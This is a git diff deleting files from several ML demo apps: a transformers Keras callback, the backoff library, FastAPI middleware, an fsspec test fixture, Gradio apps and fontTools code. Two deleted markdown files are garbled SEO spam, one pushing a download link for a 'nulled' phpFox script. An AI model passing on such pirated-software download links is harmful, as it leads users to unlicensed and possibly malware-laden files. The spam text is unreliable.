predict/generate loop is handled inside this method - for batch in self.eval_dataset: - if isinstance(batch, tuple): - batch, labels = batch - else: - labels = None - if self.predict_with_generate: - if isinstance(batch, dict): - generation_inputs = batch[main_input_name] - attention_mask = batch.get("attention_mask", None) - else: - generation_inputs = batch - attention_mask = None - if self.use_xla_generation: - predictions = self.generation_function(generation_inputs, attention_mask=attention_mask) - else: - predictions = self.model.generate(generation_inputs, attention_mask=attention_mask) - else: - predictions = self.model.predict_on_batch(batch) - if isinstance(predictions, dict): - # This converts any dict-subclass to a regular dict - # Keras REALLY doesn't like it when we pass around a BatchEncoding or other derived class - predictions = dict(predictions) - if self.output_cols is not None: - predictions = {key: predictions[key] for key in self.output_cols} - else: - predictions = { - key: val for key, val in predictions.items() if key not in ignore_keys + ["loss"] - } - prediction_list.append(predictions) - if not self.use_keras_label: - labels = {key: batch[key].numpy() for key in self.label_cols} - elif isinstance(labels, dict): - labels = {key: array.numpy() for key, array in labels.items()} - elif isinstance(labels, list) or isinstance(labels, tuple): - labels = [array.numpy() for array in labels] - elif isinstance(labels, tf.Tensor): - labels = labels.numpy() - else: - raise TypeError(f"Confused by labels of type {type(labels)}") - label_list.append(labels) - - all_preds = self._postprocess_predictions_or_labels(prediction_list) - all_labels = self._postprocess_predictions_or_labels(label_list) - - metric_output = self.metric_fn((all_preds, all_labels)) - if not isinstance(metric_output, dict): - raise TypeError( - f"metric_fn should return a dict mapping metric names to values but instead returned {metric_output}" - ) - # This is the critical bit - Keras passes a dict containing the loss and standard metric values for this epoch - # in the logs argument. Ordinarily, this is so the callback can read them, but in this case we write a bunch of - # new keys in there, which will then get read by the History callback and treated like any other metric value. - # I promise that I have it in writing from Chollet that this is okay. - logs.update(metric_output) - - -class PushToHubCallback(Callback): - """ - Callback that will save and push the model to the Hub regularly. By default, it pushes once per epoch, but this can - be changed with the `save_strategy` argument. Pushed models can be accessed like any other model on the hub, such - as with the `from_pretrained` method. - - ```py - from transformers.keras_callbacks import PushToHubCallback - - push_to_hub_callback = PushToHubCallback( - output_dir="./model_save", - tokenizer=tokenizer, - hub_model_id="gpt5-7xlarge", - ) - - model.fit(train_dataset, callbacks=[push_to_hub_callback]) - ``` - - Args: - output_dir (`str`): - The output directory where the model predictions and checkpoints will be written and synced with the - repository on the Hub. - save_strategy (`str` or [`~trainer_utils.IntervalStrategy`], *optional*, defaults to `"epoch"`): - The checkpoint save strategy to adopt during training. Possible values are: - - - `"no"`: Save is done at the end of training. - - `"epoch"`: Save is done at the end of each epoch. - - `"steps"`: Save is done every `save_steps` - save_steps (`int`, *optional*): - The number of steps between saves when using the "steps" `save_strategy`. - tokenizer (`PreTrainedTokenizerBase`, *optional*): - The tokenizer used by the model. If supplied, will be uploaded to the repo alongside the weights. - hub_model_id (`str`, *optional*): - The name of the repository to keep in sync with the local `output_dir`. It can be a simple model ID in - which case the model will be pushed in your namespace. Otherwise it should be the whole repository name, - for instance `"user_name/model"`, which allows you to push to an organization you are a member of with - `"organization_name/model"`. - - Will default to the name of `output_dir`. - hub_token (`str`, *optional*): - The token to use to push the model to the Hub. Will default to the token in the cache folder obtained with - `huggingface-cli login`. - checkpoint (`bool`, *optional*, defaults to `False`): - Whether to save full training checkpoints (including epoch and optimizer state) to allow training to be - resumed. Only usable when `save_strategy` is `"epoch"`. - """ - - def __init__( - self, - output_dir: Union[str, Path], - save_strategy: Union[str, IntervalStrategy] = "epoch", - save_steps: Optional[int] = None, - tokenizer: Optional[PreTrainedTokenizerBase] = None, - hub_model_id: Optional[str] = None, - hub_token: Optional[str] = None, - checkpoint: bool = False, - **model_card_args, - ): - super().__init__() - if checkpoint and save_strategy != "epoch": - raise ValueError("Cannot save checkpoints when save_strategy is not 'epoch'!") - if isinstance(save_strategy, str): - save_strategy = IntervalStrategy(save_strategy.lower()) - self.save_strategy = save_strategy - if self.save_strategy == IntervalStrategy.STEPS and (not isinstance(save_steps, int) or save_steps <= 0): - raise ValueError("Please supply a positive integer argument for save_steps when save_strategy == 'steps'!") - self.save_steps = save_steps - output_dir = Path(output_dir) - if hub_model_id is None: - hub_model_id = output_dir.absolute().name - if "/" not in hub_model_id: - hub_model_id = get_full_repo_name(hub_model_id, token=hub_token) - - self.output_dir = output_dir - self.hub_model_id = hub_model_id - create_repo(self.hub_model_id, exist_ok=True) - self.repo = Repository(str(self.output_dir), clone_from=self.hub_model_id, token=hub_token) - - self.tokenizer = tokenizer - self.last_job = None - self.checkpoint = checkpoint - self.training_history = None - self.model_card_args = model_card_args - - def on_train_begin(self, logs=None): - # Although we can access model.history, we have no guarantees that the History callback will fire before this - # one, so we keep track of it here too - self.training_history = [] - - def on_train_batch_end(self, batch, logs=None): - if self.save_strategy == IntervalStrategy.STEPS and (batch + 1) % self.save_steps == 0: - if self.last_job is not None and not self.last_job.is_done: - return # The last upload is still running, don't start another - self.model.save_pretrained(self.output_dir) - if self.tokenizer is not None: - self.tokenizer.save_pretrained(self.output_dir) - _, self.last_job = self.repo.push_to_hub( - commit_message=f"Training in progress steps {batch}", blocking=False - ) - - def on_epoch_end(self, epoch, logs=None): - logs = logs.copy() # Don't accidentally write things that Keras will read later - if "epoch" not in logs: - logs["epoch"] = epoch - self.training_history.append(logs) - if self.save_strategy == IntervalStrategy.EPOCH: - if self.last_job is not None and not self.last_job.is_done: - return # The last upload is still running, don't start another - self.model.save_pretrained(self.output_dir) - if self.tokenizer is not None: - self.tokenizer.save_pretrained(self.output_dir) - if self.checkpoint: - checkpoint_dir = os.path.join(self.output_dir, "checkpoint") - self.model._save_checkpoint(checkpoint_dir, epoch) - train_summary = TrainingSummary.from_keras( - model=self.model, - model_name=self.hub_model_id, - keras_history=self.training_history, - **self.model_card_args, - ) - model_card = train_summary.to_model_card() - with (self.output_dir / "README.md").open("w") as f: - f.write(model_card) - _, self.last_job = self.repo.push_to_hub( - commit_message=f"Training in progress epoch {epoch}", blocking=False - ) - - def on_train_end(self, logs=None): - # Makes sure the latest version of the model is uploaded - if self.last_job is not None and not self.last_job.is_done: - logging.info("Pushing the last epoch to the Hub, this may take a while...") - while not self.last_job.is_done: - sleep(1) - else: - self.model.save_pretrained(self.output_dir) - if self.tokenizer is not None: - self.tokenizer.save_pretrained(self.output_dir) - train_summary = TrainingSummary.from_keras( - model=self.model, - model_name=self.hub_model_id, - keras_history=self.training_history, - **self.model_card_args, - ) - model_card = train_summary.to_model_card() - with (self.output_dir / "README.md").open("w") as f: - f.write(model_card) - self.repo.push_to_hub(commit_message="End of training", blocking=True) diff --git a/spaces/chongjie/PoseDiffusion_MVP/models/__init__.py b/spaces/chongjie/PoseDiffusion_MVP/models/__init__.py deleted file mode 100644 index 55caf1ef35c4dba7a1d017a8315c76e076ecacd0..0000000000000000000000000000000000000000 --- a/spaces/chongjie/PoseDiffusion_MVP/models/__init__.py +++ /dev/null @@ -1,12 +0,0 @@ -# Copyright (c) Meta Platforms, Inc. and affiliates. -# All rights reserved. -# -# This source code is licensed under the license found in the -# LICENSE file in the root directory of this source tree. - -from .pose_diffusion_model import PoseDiffusionModel - - -from .denoiser import Denoiser, TransformerEncoderWrapper -from .gaussian_diffuser import GaussianDiffusion -from .image_feature_extractor import MultiScaleImageFeatureExtractor diff --git a/spaces/chrisbodhi/minima/app.py b/spaces/chrisbodhi/minima/app.py deleted file mode 100644 index c10ca1e056f37147265cada14d28b2e70e7cd58b..0000000000000000000000000000000000000000 --- a/spaces/chrisbodhi/minima/app.py +++ /dev/null @@ -1,21 +0,0 @@ -import gradio as gr -from fastai.vision.all import * -import skimage - - -def is_cat(x): return x[0].isupper() - -learn = load_learner('model.pkl') - -categories = ('Dog', 'Cat') - -def predict(img): - pred, idx, probs = learn.predict(img) - print(pred, idx) - return dict(zip(categories, map(float,probs))) - -image = gr.inputs.Image(shape=(192, 192)) -label = gr.outputs.Label() - -intf = gr.Interface(fn=predict, inputs=image, outputs=label) -intf.launch(inline=False) diff --git a/spaces/chuan-hd/law-assistant-chatbot/.venv/lib/python3.11/site-packages/backoff/_decorator.py b/spaces/chuan-hd/law-assistant-chatbot/.venv/lib/python3.11/site-packages/backoff/_decorator.py deleted file mode 100644 index 92dee1bb76178d0beaa2ae841d5d0325e3ac27d3..0000000000000000000000000000000000000000 --- a/spaces/chuan-hd/law-assistant-chatbot/.venv/lib/python3.11/site-packages/backoff/_decorator.py +++ /dev/null @@ -1,222 +0,0 @@ -# coding:utf-8 -import asyncio -import logging -import operator -from typing import Any, Callable, Iterable, Optional, Type, Union - -from backoff._common import ( - _prepare_logger, - _config_handlers, - _log_backoff, - _log_giveup -) -from backoff._jitter import full_jitter -from backoff import _async, _sync -from backoff._typing import ( - _CallableT, - _Handler, - _Jitterer, - _MaybeCallable, - _MaybeLogger, - _MaybeSequence, - _Predicate, - _WaitGenerator, -) - - -def on_predicate(wait_gen: _WaitGenerator, - predicate: _Predicate[Any] = operator.not_, - *, - max_tries: Optional[_MaybeCallable[int]] = None, - max_time: Optional[_MaybeCallable[float]] = None, - jitter: Union[_Jitterer, None] = full_jitter, - on_success: Union[_Handler, Iterable[_Handler], None] = None, - on_backoff: Union[_Handler, Iterable[_Handler], None] = None, - on_giveup: Union[_Handler, Iterable[_Handler], None] = None, - logger: _MaybeLogger = 'backoff', - backoff_log_level: int = logging.INFO, - giveup_log_level: int = logging.ERROR, - **wait_gen_kwargs: Any) -> Callable[[_CallableT], _CallableT]: - """Returns decorator for backoff and retry triggered by predicate. - - Args: - wait_gen: A generator yielding successive wait times in - seconds. - predicate: A function which when called on the return value of - the target function will trigger backoff when considered - truthily. If not specified, the default behavior is to - backoff on falsey return values. - max_tries: The maximum number of attempts to make before giving - up. In the case of failure, the result of the last attempt - will be returned. The default value of None means there - is no limit to the number of tries. If a callable is passed, - it will be evaluated at runtime and its return value used. - max_time: The maximum total amount of time to try for before - giving up. If this time expires, the result of the last - attempt will be returned. If a callable is passed, it will - be evaluated at runtime and its return value used. - jitter: A function of the value yielded by wait_gen returning - the actual time to wait. This distributes wait times - stochastically in order to avoid timing collisions across - concurrent clients. Wait times are jittered by default - using the full_jitter function. Jittering may be disabled - altogether by passing jitter=None. - on_success: Callable (or iterable of callables) with a unary - signature to be called in the event of success. The - parameter is a dict containing details about the invocation. - on_backoff: Callable (or iterable of callables) with a unary - signature to be called in the event of a backoff. The - parameter is a dict containing details about the invocation. - on_giveup: Callable (or iterable of callables) with a unary - signature to be called in the event that max_tries - is exceeded. The parameter is a dict containing details - about the invocation. - logger: Name of logger or Logger object to log to. Defaults to - 'backoff'. - backoff_log_level: log level for the backoff event. Defaults to "INFO" - giveup_log_level: log level for the give up event. Defaults to "ERROR" - **wait_gen_kwargs: Any additional keyword args specified will be - passed to wait_gen when it is initialized. Any callable - args will first be evaluated and their return values passed. - This is useful for runtime configuration. - """ - def decorate(target): - nonlocal logger, on_success, on_backoff, on_giveup - - logger = _prepare_logger(logger) - on_success = _config_handlers(on_success) - on_backoff = _config_handlers( - on_backoff, - default_handler=_log_backoff, - logger=logger, - log_level=backoff_log_level - ) - on_giveup = _config_handlers( - on_giveup, - default_handler=_log_giveup, - logger=logger, - log_level=giveup_log_level - ) - - if asyncio.iscoroutinefunction(target): - retry = _async.retry_predicate - else: - retry = _sync.retry_predicate - - return retry( - target, - wait_gen, - predicate, - max_tries=max_tries, - max_time=max_time, - jitter=jitter, - on_success=on_success, - on_backoff=on_backoff, - on_giveup=on_giveup, - wait_gen_kwargs=wait_gen_kwargs - ) - - # Return a function which decorates a target with a retry loop. - return decorate - - -def on_exception(wait_gen: _WaitGenerator, - exception: _MaybeSequence[Type[Exception]], - *, - max_tries: Optional[_MaybeCallable[int]] = None, - max_time: Optional[_MaybeCallable[float]] = None, - jitter: Union[_Jitterer, None] = full_jitter, - giveup: _Predicate[Exception] = lambda e: False, - on_success: Union[_Handler, Iterable[_Handler], None] = None, - on_backoff: Union[_Handler, Iterable[_Handler], None] = None, - on_giveup: Union[_Handler, Iterable[_Handler], None] = None, - raise_on_giveup: bool = True, - logger: _MaybeLogger = 'backoff', - backoff_log_level: int = logging.INFO, - giveup_log_level: int = logging.ERROR, - **wait_gen_kwargs: Any) -> Callable[[_CallableT], _CallableT]: - """Returns decorator for backoff and retry triggered by exception. - - Args: - wait_gen: A generator yielding successive wait times in - seconds. - exception: An exception type (or tuple of types) which triggers - backoff. - max_tries: The maximum number of attempts to make before giving - up. Once exhausted, the exception will be allowed to escape. - The default value of None means there is no limit to the - number of tries. If a callable is passed, it will be - evaluated at runtime and its return value used. - max_time: The maximum total amount of time to try for before - giving up. Once expired, the exception will be allowed to - escape. If a callable is passed, it will be - evaluated at runtime and its return value used. - jitter: A function of the value yielded by wait_gen returning - the actual time to wait. This distributes wait times - stochastically in order to avoid timing collisions across - concurrent clients. Wait times are jittered by default - using the full_jitter function. Jittering may be disabled - altogether by passing jitter=None. - giveup: Function accepting an exception instance and - returning whether or not to give up. Optional. The default - is to always continue. - on_success: Callable (or iterable of callables) with a unary - signature to be called in the event of success. The - parameter is a dict containing details about the invocation. - on_backoff: Callable (or iterable of callables) with a unary - signature to be called in the event of a backoff. The - parameter is a dict containing details about the invocation. - on_giveup: Callable (or iterable of callables) with a unary - signature to be called in the event that max_tries - is exceeded. The parameter is a dict containing details - about the invocation. - raise_on_giveup: Boolean indicating whether the registered exceptions - should be raised on giveup. Defaults to `True` - logger: Name or Logger object to log to. Defaults to 'backoff'. - backoff_log_level: log level for the backoff event. Defaults to "INFO" - giveup_log_level: log level for the give up event. Defaults to "ERROR" - **wait_gen_kwargs: Any additional keyword args specified will be - passed to wait_gen when it is initialized. Any callable - args will first be evaluated and their return values passed. - This is useful for runtime configuration. - """ - def decorate(target): - nonlocal logger, on_success, on_backoff, on_giveup - - logger = _prepare_logger(logger) - on_success = _config_handlers(on_success) - on_backoff = _config_handlers( - on_backoff, - default_handler=_log_backoff, - logger=logger, - log_level=backoff_log_level, - ) - on_giveup = _config_handlers( - on_giveup, - default_handler=_log_giveup, - logger=logger, - log_level=giveup_log_level, - ) - - if asyncio.iscoroutinefunction(target): - retry = _async.retry_exception - else: - retry = _sync.retry_exception - - return retry( - target, - wait_gen, - exception, - max_tries=max_tries, - max_time=max_time, - jitter=jitter, - giveup=giveup, - on_success=on_success, - on_backoff=on_backoff, - on_giveup=on_giveup, - raise_on_giveup=raise_on_giveup, - wait_gen_kwargs=wait_gen_kwargs - ) - - # Return a function which decorates a target with a retry loop. - return decorate diff --git a/spaces/chuan-hd/law-assistant-chatbot/.venv/lib/python3.11/site-packages/docx/text/__init__.py b/spaces/chuan-hd/law-assistant-chatbot/.venv/lib/python3.11/site-packages/docx/text/__init__.py deleted file mode 100644 index e69de29bb2d1d6434b8b29ae775ad8c2e48c5391..0000000000000000000000000000000000000000 diff --git a/spaces/chuan-hd/law-assistant-chatbot/.venv/lib/python3.11/site-packages/fastapi/middleware/asyncexitstack.py b/spaces/chuan-hd/law-assistant-chatbot/.venv/lib/python3.11/site-packages/fastapi/middleware/asyncexitstack.py deleted file mode 100644 index 30a0ae626c26cc285e7e89e38180043239d9b0eb..0000000000000000000000000000000000000000 --- a/spaces/chuan-hd/law-assistant-chatbot/.venv/lib/python3.11/site-packages/fastapi/middleware/asyncexitstack.py +++ /dev/null @@ -1,25 +0,0 @@ -from typing import Optional - -from fastapi.concurrency import AsyncExitStack -from starlette.types import ASGIApp, Receive, Scope, Send - - -class AsyncExitStackMiddleware: - def __init__(self, app: ASGIApp, context_name: str = "fastapi_astack") -> None: - self.app = app - self.context_name = context_name - - async def __call__(self, scope: Scope, receive: Receive, send: Send) -> None: - dependency_exception: Optional[Exception] = None - async with AsyncExitStack() as stack: - scope[self.context_name] = stack - try: - await self.app(scope, receive, send) - except Exception as e: - dependency_exception = e - raise e - if dependency_exception: - # This exception was possibly handled by the dependency but it should - # still bubble up so that the ServerErrorMiddleware can return a 500 - # or the ExceptionMiddleware can catch and handle any other exceptions - raise dependency_exception diff --git a/spaces/chuan-hd/law-assistant-chatbot/.venv/lib/python3.11/site-packages/fsspec/conftest.py b/spaces/chuan-hd/law-assistant-chatbot/.venv/lib/python3.11/site-packages/fsspec/conftest.py deleted file mode 100644 index 6874a42c4895c3c7b973dc5d63fd4488a4e60b44..0000000000000000000000000000000000000000 --- a/spaces/chuan-hd/law-assistant-chatbot/.venv/lib/python3.11/site-packages/fsspec/conftest.py +++ /dev/null @@ -1,55 +0,0 @@ -import os -import shutil -import subprocess -import sys -import time - -import pytest - -import fsspec -from fsspec.implementations.cached import CachingFileSystem - - -@pytest.fixture() -def m(): - """ - Fixture providing a memory filesystem. - """ - m = fsspec.filesystem("memory") - m.store.clear() - m.pseudo_dirs.clear() - m.pseudo_dirs.append("") - try: - yield m - finally: - m.store.clear() - m.pseudo_dirs.clear() - m.pseudo_dirs.append("") - - -@pytest.fixture -def ftp_writable(tmpdir): - """ - Fixture providing a writable FTP filesystem. - """ - pytest.importorskip("pyftpdlib") - from fsspec.implementations.ftp import FTPFileSystem - - FTPFileSystem.clear_instance_cache() # remove lingering connections - CachingFileSystem.clear_instance_cache() - d = str(tmpdir) - with open(os.path.join(d, "out"), "wb") as f: - f.write(b"hello" * 10000) - P = subprocess.Popen( - [sys.executable, "-m", "pyftpdlib", "-d", d, "-u", "user", "-P", "pass", "-w"] - ) - try: - time.sleep(1) - yield "localhost", 2121, "user", "pass" - finally: - P.terminate() - P.wait() - try: - shutil.rmtree(tmpdir) - except Exception: - pass diff --git a/spaces/cihyFjudo/fairness-paper-search/Im Not the Only One by Sam Smith A Masterpiece of Soulful Pop Music.md b/spaces/cihyFjudo/fairness-paper-search/Im Not the Only One by Sam Smith A Masterpiece of Soulful Pop Music.md deleted file mode 100644 index 5d6b15b76bec5528bb38f150ff6762ce4bd5e135..0000000000000000000000000000000000000000 --- a/spaces/cihyFjudo/fairness-paper-search/Im Not the Only One by Sam Smith A Masterpiece of Soulful Pop Music.md +++ /dev/null @@ -1,5 +0,0 @@ - -

      [url= -smith/2022/capital-one-arena-washington-dc-2bbc9cca.html][img] -image-v1?id=2bbc9cca[/img][/url][url= =2bbc9cca&step=song]Edit this setlist[/url] | [url= -smith-33d6703d.html]More Sam Smith setlists[/url]

      -

      i'm not the one sam smith


      Downloadhttps://tinurli.com/2uwi1Q



      aaccfb2cb3
      -
      -
      \ No newline at end of file diff --git a/spaces/cihyFjudo/fairness-paper-search/phpFox v3 6 0 Nulled Script 1 Features Benefits and Reviews of phpFox Social Network Platform.md b/spaces/cihyFjudo/fairness-paper-search/phpFox v3 6 0 Nulled Script 1 Features Benefits and Reviews of phpFox Social Network Platform.md deleted file mode 100644 index 79697e6fee539f30ce97ac4028b7fa5f084e60ab..0000000000000000000000000000000000000000 --- a/spaces/cihyFjudo/fairness-paper-search/phpFox v3 6 0 Nulled Script 1 Features Benefits and Reviews of phpFox Social Network Platform.md +++ /dev/null @@ -1,6 +0,0 @@ -

      phpfox v3 6 0 nulled script 1


      DOWNLOAD –––––>>> https://tinurli.com/2uwjS6



      -
      - aaccfb2cb3
      -
      -
      -

      diff --git a/spaces/cjayic/soft-vc-widowmaker/acoustic/__init__.py b/spaces/cjayic/soft-vc-widowmaker/acoustic/__init__.py deleted file mode 100644 index 38186d082ce0ebfd2c51a37eec2be085520a8b1c..0000000000000000000000000000000000000000 --- a/spaces/cjayic/soft-vc-widowmaker/acoustic/__init__.py +++ /dev/null @@ -1 +0,0 @@ -from .model import AcousticModel, hubert_discrete, hubert_soft diff --git a/spaces/cloudqi/CQI_Fala_para_Texto_PT_V0/app.py b/spaces/cloudqi/CQI_Fala_para_Texto_PT_V0/app.py deleted file mode 100644 index 08b1492503afcf121572ceb06d5cccc43b650348..0000000000000000000000000000000000000000 --- a/spaces/cloudqi/CQI_Fala_para_Texto_PT_V0/app.py +++ /dev/null @@ -1,101 +0,0 @@ -import torch - -import gradio as gr -import pytube as pt -from transformers import pipeline -from huggingface_hub import model_info - -MODEL_NAME = "cloudqi/cqi_speech_recognize_pt_v0" - -device = "cuda" if torch.cuda.is_available() else "cpu" - -pipe = pipeline( - task="automatic-speech-recognition", - model=MODEL_NAME, - chunk_length_s=30, - device=device, -) - -langs = model_info(MODEL_NAME).cardData["language"] - -article = f"
      Esse modelo suporta {len(langs)} línguas ! (Clique para expandir)> {langs}
      " - -def transcribe(microphone, file_upload): - warn_output = "" - if (microphone is not None) and (file_upload is not None): - warn_output = ( - "WARNING: Você carregou um arquivo de áudio e usou o microfone. " - "The recorded file from the microphone will be used and the uploaded audio will be discarded.\n" - ) - - elif (microphone is None) and (file_upload is None): - return "ERROR: Transcreva microfones longos ou entradas de áudio com o clique de um botão" - - file = microphone if microphone is not None else file_upload - - text = pipe(file)["text"] - - return warn_output + text - - -def _return_yt_html_embed(yt_url): - video_id = yt_url.split("?v=")[-1] - HTML_str = ( - f'
      ' - "
      " - ) - return HTML_str - - -def yt_transcribe(yt_url): - yt = pt.YouTube(yt_url) - html_embed_str = _return_yt_html_embed(yt_url) - stream = yt.streams.filter(only_audio=True)[0] - stream.download(filename="audio.mp3") - - text = pipe("audio.mp3")["text"] - - return html_embed_str, text - - -demo = gr.Blocks() - -mf_transcribe = gr.Interface( - fn=transcribe, - inputs=[ - gr.inputs.Audio(source="microphone", type="filepath", optional=True), - gr.inputs.Audio(source="upload", type="filepath", optional=True), - ], - outputs="text", - layout="horizontal", - theme="huggingface", - title="Demonstração: Transcrever Audio", - description=( - "Transcreva microfones longos ou entradas de áudio com o clique de um botão! Essa Demo usa o ajuste fino" - f" checkpoint [{MODEL_NAME}](https://huggingface.co/{MODEL_NAME}) e 🤗 Transformers para transcrever arquivos de áudio" - " de comprimento arbitrário." - ), - article=article, - allow_flagging="never", -) - -yt_transcribe = gr.Interface( - fn=yt_transcribe, - inputs=[gr.inputs.Textbox(lines=1, placeholder="Cole o URL de um vídeo do YouTube aqui", label="YouTube URL")], - outputs=["html", "text"], - layout="horizontal", - theme="huggingface", - title="Transcrever do YouTube", - description=( - "Gere legendas com um clique ! A demonstração usa o ponto de verificação aprimorado:" - f" [{MODEL_NAME}](https://huggingface.co/{MODEL_NAME}) e 🤗 Transformers para transcrever arquivos de áudio de" - " comprimento arbitrário." - ), - article=article, - allow_flagging="never", -) - -with demo: - gr.TabbedInterface([mf_transcribe, yt_transcribe], ["Transcrever de áudio", "Transcrever do YouTube"]) - -demo.launch(enable_queue=True) diff --git a/spaces/cloudtheboi/Lofi4All/.pythonlibs/lib/python3.10/site-packages/fontTools/misc/roundTools.py b/spaces/cloudtheboi/Lofi4All/.pythonlibs/lib/python3.10/site-packages/fontTools/misc/roundTools.py deleted file mode 100644 index 48a47c07c8575895f894a24065046bc308a69b97..0000000000000000000000000000000000000000 --- a/spaces/cloudtheboi/Lofi4All/.pythonlibs/lib/python3.10/site-packages/fontTools/misc/roundTools.py +++ /dev/null @@ -1,109 +0,0 @@ -""" -Various round-to-integer helpers. -""" - -import math -import functools -import logging - -log = logging.getLogger(__name__) - -__all__ = [ - "noRound", - "otRound", - "maybeRound", - "roundFunc", -] - - -def noRound(value): - return value - - -def otRound(value): - """Round float value to nearest integer towards ``+Infinity``. - - The OpenType spec (in the section on `"normalization" of OpenType Font Variations `_) - defines the required method for converting floating point values to - fixed-point. In particular it specifies the following rounding strategy: - - for fractional values of 0.5 and higher, take the next higher integer; - for other fractional values, truncate. - - This function rounds the floating-point value according to this strategy - in preparation for conversion to fixed-point. - - Args: - value (float): The input floating-point value. - - Returns - float: The rounded value. - """ - # See this thread for how we ended up with this implementation: - # https://github.com/fonttools/fonttools/issues/1248#issuecomment-383198166 - return int(math.floor(value + 0.5)) - - -def maybeRound(v, tolerance, round=otRound): - rounded = round(v) - return rounded if abs(rounded - v) <= tolerance else v - - -def roundFunc(tolerance, round=otRound): - if tolerance < 0: - raise ValueError("Rounding tolerance must be positive") - - if tolerance == 0: - return noRound - - if tolerance >= 0.5: - return round - - return functools.partial(maybeRound, tolerance=tolerance, round=round) - - -def nearestMultipleShortestRepr(value: float, factor: float) -> str: - """Round to nearest multiple of factor and return shortest decimal representation. - - This chooses the float that is closer to a multiple of the given factor while - having the shortest decimal representation (the least number of fractional decimal - digits). - - For example, given the following: - - >>> nearestMultipleShortestRepr(-0.61883544921875, 1.0/(1<<14)) - '-0.61884' - - Useful when you need to serialize or print a fixed-point number (or multiples - thereof, such as F2Dot14 fractions of 180 degrees in COLRv1 PaintRotate) in - a human-readable form. - - Args: - value (value): The value to be rounded and serialized. - factor (float): The value which the result is a close multiple of. - - Returns: - str: A compact string representation of the value. - """ - if not value: - return "0.0" - - value = otRound(value / factor) * factor - eps = 0.5 * factor - lo = value - eps - hi = value + eps - # If the range of valid choices spans an integer, return the integer. - if int(lo) != int(hi): - return str(float(round(value))) - - fmt = "%.8f" - lo = fmt % lo - hi = fmt % hi - assert len(lo) == len(hi) and lo != hi - for i in range(len(lo)): - if lo[i] != hi[i]: - break - period = lo.find(".") - assert period < i - fmt = "%%.%df" % (i - period) - return fmt % value diff --git a/spaces/cloudtheboi/Lofi4All/.pythonlibs/lib/python3.10/site-packages/fontTools/ufoLib/__init__.py b/spaces/cloudtheboi/Lofi4All/.pythonlibs/lib/python3.10/site-packages/fontTools/ufoLib/__init__.py deleted file mode 100644 index 1a456a206f815ffdf624e4c420539a9eaf1903ca..0000000000000000000000000000000000000000 --- a/spaces/cloudtheboi/Lofi4All/.pythonlibs/lib/python3.10/site-packages/fontTools/ufoLib/__init__.py +++ /dev/null @@ -1,2464 +0,0 @@ -import os -from copy import deepcopy -from os import fsdecode -import logging -import zipfile -import enum -from collections import OrderedDict -import fs -import fs.base -import fs.subfs -import fs.errors -import fs.copy -import fs.osfs -import fs.zipfs -import fs.tempfs -import fs.tools -from fontTools.misc import plistlib -from fontTools.ufoLib.validators import * -from fontTools.ufoLib.filenames import userNameToFileName -from fontTools.ufoLib.converters import convertUFO1OrUFO2KerningToUFO3Kerning -from fontTools.ufoLib.errors import UFOLibError -from fontTools.ufoLib.utils import numberTypes, _VersionTupleEnumMixin - -""" -A library for importing .ufo files and their descendants. -Refer to http://unifiedfontobject.com for the UFO specification. - -The UFOReader and UFOWriter classes support versions 1, 2 and 3 -of the specification. - -Sets that list the font info attribute names for the fontinfo.plist -formats are available for external use. These are: - fontInfoAttributesVersion1 - fontInfoAttributesVersion2 - fontInfoAttributesVersion3 - -A set listing the fontinfo.plist attributes that were deprecated -in version 2 is available for external use: - deprecatedFontInfoAttributesVersion2 - -Functions that do basic validation on values for fontinfo.plist -are available for external use. These are - validateFontInfoVersion2ValueForAttribute - validateFontInfoVersion3ValueForAttribute - -Value conversion functions are available for converting -fontinfo.plist values between the possible format versions. - convertFontInfoValueForAttributeFromVersion1ToVersion2 - convertFontInfoValueForAttributeFromVersion2ToVersion1 - convertFontInfoValueForAttributeFromVersion2ToVersion3 - convertFontInfoValueForAttributeFromVersion3ToVersion2 -""" - -__all__ = [ - "makeUFOPath", - "UFOLibError", - "UFOReader", - "UFOWriter", - "UFOReaderWriter", - "UFOFileStructure", - "fontInfoAttributesVersion1", - "fontInfoAttributesVersion2", - "fontInfoAttributesVersion3", - "deprecatedFontInfoAttributesVersion2", - "validateFontInfoVersion2ValueForAttribute", - "validateFontInfoVersion3ValueForAttribute", - "convertFontInfoValueForAttributeFromVersion1ToVersion2", - "convertFontInfoValueForAttributeFromVersion2ToVersion1", -] - -__version__ = "3.0.0" - - -logger = logging.getLogger(__name__) - - -# --------- -# Constants -# --------- - -DEFAULT_GLYPHS_DIRNAME = "glyphs" -DATA_DIRNAME = "data" -IMAGES_DIRNAME = "images" -METAINFO_FILENAME = "metainfo.plist" -FONTINFO_FILENAME = "fontinfo.plist" -LIB_FILENAME = "lib.plist" -GROUPS_FILENAME = "groups.plist" -KERNING_FILENAME = "kerning.plist" -FEATURES_FILENAME = "features.fea" -LAYERCONTENTS_FILENAME = "layercontents.plist" -LAYERINFO_FILENAME = "layerinfo.plist" - -DEFAULT_LAYER_NAME = "public.default" - - -class UFOFormatVersion(tuple, _VersionTupleEnumMixin, enum.Enum): - FORMAT_1_0 = (1, 0) - FORMAT_2_0 = (2, 0) - FORMAT_3_0 = (3, 0) - - -# python 3.11 doesn't like when a mixin overrides a dunder method like __str__ -# for some reasons it keep using Enum.__str__, see -# https://github.com/fonttools/fonttools/pull/2655 -UFOFormatVersion.__str__ = _VersionTupleEnumMixin.__str__ - - -class UFOFileStructure(enum.Enum): - ZIP = "zip" - PACKAGE = "package" - - -# -------------- -# Shared Methods -# -------------- - - -class _UFOBaseIO: - def getFileModificationTime(self, path): - """ - Returns the modification time for the file at the given path, as a - floating point number giving the number of seconds since the epoch. - The path must be relative to the UFO path. - Returns None if the file does not exist. - """ - try: - dt = self.fs.getinfo(fsdecode(path), namespaces=["details"]).modified - except (fs.errors.MissingInfoNamespace, fs.errors.ResourceNotFound): - return None - else: - return dt.timestamp() - - def _getPlist(self, fileName, default=None): - """ - Read a property list relative to the UFO filesystem's root. - Raises UFOLibError if the file is missing and default is None, - otherwise default is returned. - - The errors that could be raised during the reading of a plist are - unpredictable and/or too large to list, so, a blind try: except: - is done. If an exception occurs, a UFOLibError will be raised. - """ - try: - with self.fs.open(fileName, "rb") as f: - return plistlib.load(f) - except fs.errors.ResourceNotFound: - if default is None: - raise UFOLibError( - "'%s' is missing on %s. This file is required" % (fileName, self.fs) - ) - else: - return default - except Exception as e: - # TODO(anthrotype): try to narrow this down a little - raise UFOLibError(f"'{fileName}' could not be read on {self.fs}: {e}") - - def _writePlist(self, fileName, obj): - """ - Write a property list to a file relative to the UFO filesystem's root. - - Do this sort of atomically, making it harder to corrupt existing files, - for example when plistlib encounters an error halfway during write. - This also checks to see if text matches the text that is already in the - file at path. If so, the file is not rewritten so that the modification - date is preserved. - - 